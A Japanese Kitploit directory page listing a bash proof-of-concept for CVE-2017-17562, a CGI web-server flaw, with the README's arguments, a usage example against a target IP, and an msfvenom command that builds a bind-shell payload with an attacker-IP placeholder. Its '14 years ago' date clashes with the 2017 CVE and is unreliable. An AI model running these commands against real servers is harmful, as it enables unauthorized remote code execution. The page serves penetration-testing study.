Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
bash-CVE-2017-17562 — CVE-2017-17562のPoC、bashで記述 | Kitploit
ツール/GitHubGitHub/joaomagfreitas/bash-cve-2017-17562
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育Archived
GitHubjoaomagfreitas/bash-cve-2017-17562

bash-CVE-2017-17562

CVE-2017-17562のPoC、bashで記述

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

bash-CVE-2017-17562

Bash による CVE-2017-17562 のPoC実装です。

HTTPリクエストの作成には curl が必要です。

Metasploit および @fssecur3 の実装に基づいています。

引数

以下の引数は、偵察とペイロード送信に必要となるため、設定する必要があります:

root@kitploit:~
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine

オプションとして、以下の引数も設定できます:

root@kitploit:~
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"

使用例

root@kitploit:~
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints

免責事項

本コードは学習およびデモンストレーション目的のみです。許可なくターゲットに対して使用しないでください。

このリポジトリにはペイロードは提供されていません。ただし、ターゲットOSのアーキテクチャに一致する任意のバイナリが動作するはずです。バインドシェルペイロードを作成するには、msfvenon を使用できます:

root@kitploit:~
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so
ツールをダウンロード